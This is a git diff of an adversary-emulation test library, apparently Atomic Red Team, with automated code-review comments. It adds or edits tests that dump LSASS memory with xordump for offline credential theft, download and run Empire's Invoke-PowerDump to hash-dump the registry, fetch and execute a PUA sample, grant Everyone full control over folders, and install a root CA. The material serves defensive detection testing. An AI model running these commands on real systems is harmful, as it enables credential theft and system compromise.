+##### Description: Computer must have xordump.exe +##### Check Prereq Commands: +```powershell +if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe} +``` + + + +
diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml index 2014b6e2..eb902b08 100644 --- a/atomics/T1003.001/T1003.001.yaml +++ b/atomics/T1003.001/T1003.001.yaml @@ -138,6 +138,7 @@ atomic_tests: del C:\windows\temp\dumpert.dmp >nul 2> nul name: command_prompt elevation_required: true + - name: Dump LSASS.exe Memory using Windows Task Manager auto_generated_guid: dea6c349-f1c6-44f3-87a1-1ed33a59a607 description: | @@ -158,6 +159,7 @@ atomic_tests: 3. Dump lsass.exe memory: Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file. name: manual + - name: Offline Credential Theft With Mimikatz auto_generated_guid: 453acf13-1dbd-47d7-b28a-172ce9228023 description: | 
@@ -354,3 +356,37 @@ atomic_tests: del #{output_file} name: powershell elevation_required: true + +- name: Dump LSASS.exe using imported Microsoft DLLs + auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697 + description: | + The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by + importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump + file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files. + + Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp. + supported_platforms: + - windows + input_arguments: + xordump_exe: + description: Path to xordump + type: Path + default: C:\Windows\Temp\xordump.exe + output_file: + description: Path where resulting dump should be placed + type: Path + default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp + dependencies: + - description: | + Computer must have xordump.exe + prereq_command: | + if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe} + executor: + command: | + #{xordump_exe} -out #{output_file} -x 0x41 + cleanup_command: | + Remove-Item ${output_file} -ErrorAction Ignore + name: powershell + elevation_required: true diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md index d2b817bc..1516c1da 100644 --- a/atomics/T1003.002/T1003.002.md +++ b/atomics/T1003.002/T1003.002.md 
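Review bot: The new test's `cleanup_command` reads `Remove-Item ${output_file} -ErrorAction Ignore`, but `${output_file}` is PowerShell variable syntax rather than the `#{output_file}` template placeholder used two lines above in `command`, so the variable is undefined at run time and the LSASS minidump stays on disk at the `output_file` default after the test. It should be `Remove-Item #{output_file} -ErrorAction Ignore`; the same text is reproduced in the index.yaml and T1003.001.md hunks of this diff and will be regenerated from here. The description also tells the reader to expect `$env:TEMP\lsass-xordump.t1003.001.dmp`, while the `output_file` default is `C:\Windows\Temp\lsass-xordump.t1003.001.dmp` — align the description with the default so the verification step points at the right path.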
@@ -179,7 +179,7 @@ Executes a hashdump by reading the hasshes from the registry. Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1" -Import-Module .\PowerDump.ps1 +Import-Module "$Env:Temp\PowerDump.ps1" Invoke-PowerDump ``` diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml index 081107a1..958fac22 100644 --- a/atomics/T1003.002/T1003.002.yaml +++ b/atomics/T1003.002/T1003.002.yaml @@ -94,7 +94,7 @@ atomic_tests: Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1" - Import-Module .\PowerDump.ps1 + Import-Module "$Env:Temp\PowerDump.ps1" Invoke-PowerDump name: powershell elevation_required: true diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md index 2170b0ed..709cdd61 100644 --- a/atomics/T1135/T1135.md +++ b/atomics/T1135/T1135.md 
@@ -8,13 +8,15 @@ File sharing over a Windows network occurs over the SMB protocol. (Citation: Wik - [Atomic Test #1 - Network Share Discovery](#atomic-test-1---network-share-discovery) -- [Atomic Test #2 - Network Share Discovery command prompt](#atomic-test-2---network-share-discovery-command-prompt) +- [Atomic Test #2 - Network Share Discovery - linux](#atomic-test-2---network-share-discovery---linux) -- [Atomic Test #3 - Network Share Discovery PowerShell](#atomic-test-3---network-share-discovery-powershell) +- [Atomic Test #3 - Network Share Discovery command prompt](#atomic-test-3---network-share-discovery-command-prompt) -- [Atomic Test #4 - View available share drives](#atomic-test-4---view-available-share-drives) +- [Atomic Test #4 - Network Share Discovery PowerShell](#atomic-test-4---network-share-discovery-powershell) -- [Atomic Test #5 - Share Discovery with PowerView](#atomic-test-5---share-discovery-with-powerview) +- [Atomic Test #5 - View available share drives](#atomic-test-5---view-available-share-drives) + +- [Atomic Test #6 - Share Discovery with PowerView](#atomic-test-6---share-discovery-with-powerview)
@@ -22,7 +24,7 @@ File sharing over a Windows network occurs over the SMB protocol. (Citation: Wik ## Atomic Test #1 - Network Share Discovery Network Share Discovery -**Supported Platforms:** macOS, Linux +**Supported Platforms:** macOS @@ -50,7 +52,49 @@ showmount #{computer_name}

-## Atomic Test #2 - Network Share Discovery command prompt +## Atomic Test #2 - Network Share Discovery - linux +Network Share Discovery using smbstatus + +**Supported Platforms:** Linux + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| package_checker | Package checking command. Debian - dpkg -s samba | string | rpm -q samba| +| package_installer | Package installer command. Debian - apt install samba | string | yum install -y samba| + + +#### Attack Commands: Run with `bash`! + + +```bash +smbstatus --shares +``` + + + + +#### Dependencies: Run with `bash`! +##### Description: Package with smbstatus (samba) must exist on device +##### Check Prereq Commands: +```bash +if #{package_checker} > /dev/null; then exit 0; else exit 1; fi +``` +##### Get Prereq Commands: +```bash +sudo #{package_installer} +``` + + + + +
+
+ +## Atomic Test #3 - Network Share Discovery command prompt Network Share Discovery utilizing the command prompt. The computer name variable may need to be modified to point to a different host Upon execution avalaible network shares will be displayed in the powershell session @@ -80,7 +124,7 @@ net view \\#{computer_name}

-## Atomic Test #3 - Network Share Discovery PowerShell +## Atomic Test #4 - Network Share Discovery PowerShell Network Share Discovery utilizing PowerShell. The computer name variable may need to be modified to point to a different host Upon execution, avalaible network shares will be displayed in the powershell session @@ -105,7 +149,7 @@ get-smbshare

-## Atomic Test #4 - View available share drives +## Atomic Test #5 - View available share drives View information about all of the resources that are shared on the local computer Upon execution, avalaible share drives will be displayed in the powershell session **Supported Platforms:** Windows @@ -129,7 +173,7 @@ net share

-## Atomic Test #5 - Share Discovery with PowerView
+## Atomic Test #6 - Share Discovery with PowerView
 Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed.
 **Supported Platforms:** Windows
diff --git a/atomics/T1135/T1135.yaml b/atomics/T1135/T1135.yaml
index 8434f3ce..d7558832 100644
--- a/atomics/T1135/T1135.yaml
+++ b/atomics/T1135/T1135.yaml
@@ -7,7 +7,6 @@ atomic_tests:
 Network Share Discovery
 supported_platforms:
 - macos
- - linux
 input_arguments:
 computer_name:
 description: Computer name to find a mount on.
@@ -19,6 +18,34 @@ atomic_tests:
 smbutil view -g //#{computer_name}
 showmount #{computer_name}
 name: sh
+- name: Network Share Discovery - linux
+ auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae
+ description: |
+ Network Share Discovery using smbstatus
+ supported_platforms:
+ - linux
+ input_arguments:
+ package_checker:
+ description: Package checking command. Debian - dpkg -s samba
+ type: string
+ default: rpm -q samba
+ package_installer:
+ description: Package installer command. Debian - apt install samba
+ type: string
+ default: yum install -y samba
+ dependency_executor_name: bash
+ dependencies:
+ - description: |
+ Package with smbstatus (samba) must exist on device
+ prereq_command: |
+ if #{package_checker} > /dev/null; then exit 0; else exit 1; fi
+ get_prereq_command: |
+ sudo #{package_installer}
+ executor:
+ command: |
+ smbstatus --shares
+ name: bash
+ elevation_require: true
 - name: Network Share Discovery command prompt
 auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb
 description: |
diff --git a/atomics/T1204.002/T1204.002.md b/atomics/T1204.002/T1204.002.md
index 340a7a23..eda78a1e 100644
--- a/atomics/T1204.002/T1204.002.md
+++ b/atomics/T1204.002/T1204.002.md
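Review bot: The last line of the new Linux test in T1135.yaml is spelled `elevation_require: true` rather than `elevation_required`, so the key is unknown to the schema and the test is treated as not needing elevation; the generated markdown earlier in this commit already reflects that, rendering the test as plain `Run with bash!` with no Elevation Required note. Change it to `elevation_required: true`. The prerequisite check `if #{package_checker} > /dev/null; then exit 0; else exit 1; fi` redirects only stdout, so a missing package prints the checker's stderr during the silent check; `> /dev/null 2>&1` would match the both-streams redirection the T1222.001 dependency in this same commit uses.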
@@ -22,6 +22,8 @@ While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently - [Atomic Test #7 - Headless Chrome code execution via VBA](#atomic-test-7---headless-chrome-code-execution-via-vba) +- [Atomic Test #8 - Potentially Unwanted Applications (PUA)](#atomic-test-8---potentially-unwanted-applications-pua) +
@@ -424,4 +426,39 @@ Write-Host "You will need to install Google Chrome manually to meet this require +
+
+ +## Atomic Test #8 - Potentially Unwanted Applications (PUA) +The Potentially Unwanted Applications (PUA) protection feature in antivirus software can identify and block PUAs from downloading and installing on endpoints in your network. These applications are not considered viruses, malware, or other types of threats, but might perform actions on endpoints that adversely affect their performance or use. This file is similar to EICAR test virus file, but is considered a Potentially Unwanted Application (PUA) instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection). + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| pua_url | url to PotentiallyUnwanted.exe | url | http://amtso.eicar.org/PotentiallyUnwanted.exe| +| pua_file | path to PotentiallyUnwanted.exe | Path | $env:TEMP/PotentiallyUnwanted.exe| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Invoke-WebRequest #{pua_url} -OutFile #{pua_file} +& "#{pua_file}" +``` + +#### Cleanup Commands: +```powershell +Remove-Item #{pua_file} +``` + + + + +
diff --git a/atomics/T1204.002/T1204.002.yaml b/atomics/T1204.002/T1204.002.yaml
index 4f2bad32..971dda55 100644
--- a/atomics/T1204.002/T1204.002.yaml
+++ b/atomics/T1204.002/T1204.002.yaml
@@ -288,3 +288,31 @@ atomic_tests:
 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
 Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome"
 name: powershell
+
+- name: Potentially Unwanted Applications (PUA)
+ auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295
+ description: |
+ The Potentially Unwanted Applications (PUA) protection feature in antivirus software can identify and block PUAs from downloading and installing on endpoints in your network. These applications are not considered viruses, malware, or other types of threats, but might perform actions on endpoints that adversely affect their performance or use. This file is similar to EICAR test virus file, but is considered a Potentially Unwanted Application (PUA) instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection).
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ pua_url:
+ description: url to PotentiallyUnwanted.exe
+ type: url
+ default: "http://amtso.eicar.org/PotentiallyUnwanted.exe"
+ pua_file:
+ description: path to PotentiallyUnwanted.exe
+ type: Path
+ default: "$env:TEMP/PotentiallyUnwanted.exe"
+
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ Invoke-WebRequest #{pua_url} -OutFile #{pua_file}
+ & "#{pua_file}"
+ cleanup_command: |
+ Remove-Item #{pua_file}
+
diff --git a/atomics/T1222.001/T1222.001.md b/atomics/T1222.001/T1222.001.md
index 576c3ad0..def6c2c7 100644
--- a/atomics/T1222.001/T1222.001.md
+++ b/atomics/T1222.001/T1222.001.md
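Review bot: The executor quotes the path in `& "#{pua_file}"` but leaves it bare in `Invoke-WebRequest #{pua_url} -OutFile #{pua_file}` and in the cleanup `Remove-Item #{pua_file}`, so a `$env:TEMP` containing a space (user profile paths can) splits the argument and the file that is written, executed and deleted are not the same path; quote all three uses, e.g. `-OutFile "#{pua_file}"` and `Remove-Item "#{pua_file}"`. The sample is fetched over plain `http://` and executed with no integrity check, so the test runs whatever the fetch returns; pinning the expected SHA-256 and checking it with `Get-FileHash "#{pua_file}"` before the `&` line (placeholder `<EXPECTED_SHA256>`) lets the test fail closed when the downloaded file is not the intended sample. Unlike the other new cleanup in this commit, `Remove-Item #{pua_file}` has no `-ErrorAction Ignore`, so cleanup reports an error in the expected case where PUA protection blocked the download and the file never existed.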
@@ -224,6 +224,7 @@ You can set your own path variable to "C:\*" if you prefer. | Name | Description | Type | Default Value | |------|-------------|------|---------------| | path | Path of folder to recursively set permissions on | path | C:\Users\Public\*| +| file_path | Path of folder permission back | Path | %temp%\T1222.001-folder-perms-backup.txt| #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) @@ -233,9 +234,25 @@ You can set your own path variable to "C:\*" if you prefer. icacls "#{path}" /grant Everyone:F /T /C /Q ``` +#### Cleanup Commands: +```cmd +icacls '#{path}' /restore #{file_path} /q >nul 2>&1 +``` +#### Dependencies: Run with `command_prompt`! +##### Description: Backup of original folder permissions should exist (for use in cleanup commands) +##### Check Prereq Commands: +```cmd +IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 ) +``` +##### Get Prereq Commands: +```cmd +icacls #{path} /save #{file_path} /t /q >nul 2>&1 +``` + +
diff --git a/atomics/T1222.001/T1222.001.yaml b/atomics/T1222.001/T1222.001.yaml
index 4f03b7de..1d80a6f2 100644
--- a/atomics/T1222.001/T1222.001.yaml
+++ b/atomics/T1222.001/T1222.001.yaml
@@ -132,7 +132,21 @@ atomic_tests:
 description: Path of folder to recursively set permissions on
 type: path
 default: 'C:\Users\Public\*'
+ file_path:
+ description: Path of folder permission back
+ type: Path
+ default: '%temp%\T1222.001-folder-perms-backup.txt'
+ dependency_executor_name: command_prompt
+ dependencies:
+ - description: |
+ Backup of original folder permissions should exist (for use in cleanup commands)
+ prereq_command: |
+ IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 )
+ get_prereq_command: |
+ icacls #{path} /save #{file_path} /t /q >nul 2>&1
 executor:
 command: icacls "#{path}" /grant Everyone:F /T /C /Q
+ cleanup_command: |
+ icacls '#{path}' /restore #{file_path} /q >nul 2>&1
 name: command_prompt
- elevation_required: true
\ No newline at end of file
+ elevation_required: true
diff --git a/atomics/T1518/T1518.md b/atomics/T1518/T1518.md
index 5b210391..7925bb5f 100644
--- a/atomics/T1518/T1518.md
+++ b/atomics/T1518/T1518.md
@@ -75,10 +75,10 @@ Adversaries may attempt to get a listing of non-security related software that i
-#### Attack Commands: Run with `command_prompt`!
+#### Attack Commands: Run with `sh`!
-```cmd
+```sh
 /usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist
 /usr/libexec/PlistBuddy -c "print :CFBundleVersion" /Applications/Safari.app/Contents/Info.plist
 ```
diff --git a/atomics/T1518/T1518.yaml b/atomics/T1518/T1518.yaml
index e42eefd3..c6a329a9 100644
--- a/atomics/T1518/T1518.yaml
+++ b/atomics/T1518/T1518.yaml
@@ -33,7 +33,7 @@ atomic_tests:
 supported_platforms:
 - macos
 executor:
- name: command_prompt
+ name: sh
 elevation_required: false
 command: |
 /usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist
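Review bot: The new `cleanup_command` in T1222.001.yaml, `icacls '#{path}' /restore #{file_path} /q >nul 2>&1`, wraps the path in single quotes, which cmd.exe passes through literally (the attack command on the line above correctly uses double quotes), and `/restore` takes the directory that the saved entries are relative to rather than the wildcard `C:\Users\Public\*` that `/save` was given; with both streams sent to nul the restore most likely fails silently and `Everyone:F` remains on the whole tree after a run that reports a clean "cleanup". Suggest `icacls "C:\Users\Public" /restore "#{file_path}" /q` (or a dedicated input for the restore directory) and dropping the redirection so a failed restore is visible to the operator. The prerequisite `IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 )` also accepts a backup left by an earlier run, so a second run would "restore" permissions captured after the first test had already granted Everyone full control; deleting the backup at the end of cleanup, or regenerating it unconditionally, avoids that. Minor: the input description reads `Path of folder permission back`, presumably `backup`.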
diff --git a/atomics/T1553.004/T1553.004.md b/atomics/T1553.004/T1553.004.md index 43e59df9..c17ef4a6 100644 --- a/atomics/T1553.004/T1553.004.md +++ b/atomics/T1553.004/T1553.004.md @@ -90,14 +90,14 @@ echo sudo update-ca-certificates -#### Dependencies: Run with `command_prompt`! +#### Dependencies: Run with `sh`! ##### Description: Verify the certificate exists. It generates if not on disk. ##### Check Prereq Commands: -```cmd +```sh if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: -```cmd +```sh if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} ``` @@ -123,24 +123,24 @@ Creates a root CA with openssl | key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key| -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) +#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) -```cmd +```sh sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}" ``` -#### Dependencies: Run with `command_prompt`! +#### Dependencies: Run with `sh`! ##### Description: Verify the certificate exists. It generates if not on disk. ##### Check Prereq Commands: -```cmd +```sh if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: -```cmd +```sh if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} ``` diff --git a/atomics/T1553.004/T1553.004.yaml b/atomics/T1553.004/T1553.004.yaml index d3663bc7..668dc4fe 100644 --- a/atomics/T1553.004/T1553.004.yaml +++ b/atomics/T1553.004/T1553.004.yaml 
@@ -44,7 +44,7 @@ atomic_tests:
 description: Key we create that is used to create the CA certificate
 type: Path
 default: rootCA.key
- dependency_executor_name: command_prompt
+ dependency_executor_name: sh
 dependencies:
 - description: |
 Verify the certificate exists. It generates if not on disk.
@@ -74,7 +74,7 @@ atomic_tests:
 description: Key we create that is used to create the CA certificate
 type: Path
 default: rootCA.key
- dependency_executor_name: command_prompt
+ dependency_executor_name: sh
 dependencies:
 - description: |
 Verify the certificate exists. It generates if not on disk.
@@ -86,7 +86,7 @@ atomic_tests:
 executor:
 command: |
 sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}"
- name: command_prompt
+ name: sh
 elevation_required: true
 - name: Install root CA on Windows
 auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index eba1dedd..e739deb5 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -692,3 +692,6 @@ c75612b2-9de0-4d7c-879c-10d7b077072d
 e86f1b4b-fcc1-4a2a-ae10-b49da01458db
 10447c83-fc38-462a-a936-5102363b1c43
 fcbdd43f-f4ad-42d5-98f3-0218097e2720
+86fc3f40-237f-4701-b155-81c01c48d697
+875805bc-9e86-4e87-be86-3a5527315cae
+02f35d62-9fdc-4a97-b899-a5d9a876d295